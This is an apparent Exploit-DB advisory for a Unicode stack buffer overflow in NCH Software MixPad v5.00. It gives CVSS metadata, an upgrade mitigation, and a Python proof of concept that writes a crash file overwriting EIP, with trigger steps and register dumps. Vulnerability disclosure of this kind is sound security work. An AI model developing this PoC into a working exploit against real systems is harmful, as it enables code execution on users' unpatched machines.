Vendor: MixPad
By: bzyo
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: MixPad
Affected Version From: v5.00
Affected Version To: v5.00
Patch Exists: YES
Related CWE: N/A
CPE: a:nch_software:mixpad
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP
Year: 2017

NCH Software MixPad v5.00 – Unicode Buffer Overflow

NCH Software MixPad is vulnerable to a stack-based buffer overflow when a specially crafted file is opened. A boundary error while processing the file allows data to be written past the end of a fixed-length stack buffer, corrupting memory; an attacker who supplies such a file can exploit this to execute arbitrary code.

Mitigation:

Upgrade to the latest version of NCH Software MixPad.

Exploit-DB raw data:

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
#
# no unicode jmp/call to esp
#
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC

filename = "crash.txt"

# Offsets as observed by the author on Windows XP: 251 bytes of padding
# reach the saved return address, which the two 0xCC bytes then overwrite
# (they appear as 00CC00CC in EIP once the input has been expanded to Unicode).
junk = b"A" * 251
eip = b"\xcc" * 2    # eip overwrite; a jmp/call esp address would go here
fill = b"B" * 100    # only 6 of these bytes end up at esp
buffer = junk + eip + fill

# Write in binary mode so the 0xCC bytes reach the file unchanged
# (a text-mode write under Python 3 would re-encode them).
with open(filename, 'wb') as textfile:
    textfile.write(buffer)